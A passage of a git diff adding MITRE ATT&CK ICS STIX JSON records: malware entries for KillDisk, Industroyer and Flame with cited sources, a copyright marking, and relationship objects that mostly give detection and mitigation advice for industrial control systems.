"revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0607", + "external_id": "S0607" + }, + { + "source_name": "KillDisk Ransomware", + "description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. 
Retrieved January 12, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" + }, + { + "source_name": "ESEST Black Energy Jan 2016", + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.", + "url": "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Trend Micro KillDisk 1", + "description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" + }, + { + "source_name": "Trend Micro KillDisk 2", + "description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json new file mode 100644 index 0000000000000000000000000000000000000000..267624d534e04b6ce5bbd6b80713c4f2ed86b307 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--ecda400a-e104-4623-a754-e90807fd5315", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:37:50.556Z", + "name": "Industroyer", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE", + "Win32/Industroyer" + ], + "type": "malware", + "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "created": "2021-01-04T20:42:21.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0604", + "external_id": "S0604" + }, + { + "source_name": "CRASHOVERRIDE", + "description": "(Citation: Dragos Crashoverride 2017)" + }, + { + "source_name": "Win32/Industroyer", + "description": "(Citation: ESET Industroyer)" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. 
Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json new file mode 100644 index 0000000000000000000000000000000000000000..3fde03545977e9c001ab99df33bed2ab6cee447e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--5fbee592-38c2-4db0-bf1f-a0438fa93c97", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. 
Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..f089c64454a6399f57fe48de26932c3d20e8803c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--e458d9eb-2f22-4954-a490-d84f5504adbd", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json new file mode 100644 index 0000000000000000000000000000000000000000..1786841dc2e7b641afe2d6007581cfcbff92ba62 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f2e66b39-3e2e-4b07-a150-3a386996ad73", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00b98fa6-4913-40a4-8920-befed8621c41", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:15:33.180Z", + "description": "Monitor ICS asset application logs that indicate alarm settings have changed, although not all assets will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json new file mode 100644 index 0000000000000000000000000000000000000000..9de936149020834e25463d10494756bd9e855e02 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--ec48195d-870a-4719-99ef-03c1769e0f2d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json new file mode 100644 index 0000000000000000000000000000000000000000..ac91e52e6d6e48ce22fb0e6fa952809a08b79e04 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a489d389-d34b-48ef-b635-30413e9854e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--01b4a92f-da42-4dfa-8d59-53709b65940e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only authorized administrators can change service states and configurations.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json new file mode 100644 index 0000000000000000000000000000000000000000..55234173a0001d99ff4cb8fb7734f570c48f481e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2e295321-79e2-44af-b0b3-7e2a53a65f8e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0278ddbc-67d5-444d-8082-bf9974dee920", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:45.775Z", + "description": "Monitor for an authentication attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json new file mode 100644 index 0000000000000000000000000000000000000000..b7ffb3aa941e55f401f64e1d1f660a1a7ee1bf6d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ed2527ae-58ae-4498-bfb7-41ec38c357d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json new file mode 100644 index 0000000000000000000000000000000000000000..968171c5068d49936dbf61fff73a4c17da3dedec --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--099aa404-bdb1-49aa-8333-1ee0aee3a186", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:27:54.588Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json new file mode 100644 index 0000000000000000000000000000000000000000..806a2711ab4faf91dd64dfef78312931bbdfbec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c03fd171-0bc3-4a9e-83a4-5bbbca426efd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022", + "created": "2022-09-27T17:39:15.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:24.399Z", + "description": "Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as Server Message Block (SMB).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json new file mode 100644 index 0000000000000000000000000000000000000000..2bf412025222239b9bd77cc6c9629152630317d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f215e062-dae1-4796-ada0-bd327f3db6f0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json new file mode 100644 index 0000000000000000000000000000000000000000..5b62dcf7be80c5f75d332b61d0ffd24ac3689f82 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--922e83d8-5a3f-44f6-a92d-849e51707365", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91", + "created": "2023-03-30T19:00:12.380Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:12.380Z", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json new file mode 100644 index 0000000000000000000000000000000000000000..4bc2a670b4048d4201b482bb49cf7c48303db42f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--d921494d-55de-4e54-8a6b-dcaefe809595", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04882fef-2a6b-40d0-a101-da9c76a3572e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Restrict the use of untrusted or unknown libraries, such as remote or unknown DLLs.\n", + "source_ref": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json new file mode 100644 index 0000000000000000000000000000000000000000..5594bca183135fa9359d507a3358feae0ee21722 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--3f2a5ccb-49f8-4116-a2de-ddfafc41ac4e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0491ef92-2941-4841-9fe6-2e1809788b52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.210Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json new file mode 100644 index 0000000000000000000000000000000000000000..698fad0b197d5836b6a9b21e0befd6bf8e90752c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ce95dcc8-4fb9-4b73-916a-24b8545b3404", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04bf72de-75ba-4d95-ad24-f93ad835180c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:26.520Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) erases the master boot record (MBR) and system logs, leaving the system unusable. (Citation: Booz Allen Hamilton)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json new file mode 100644 index 0000000000000000000000000000000000000000..ee32622b56a34d00da83df5b0ff4c146ac3505ad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json 
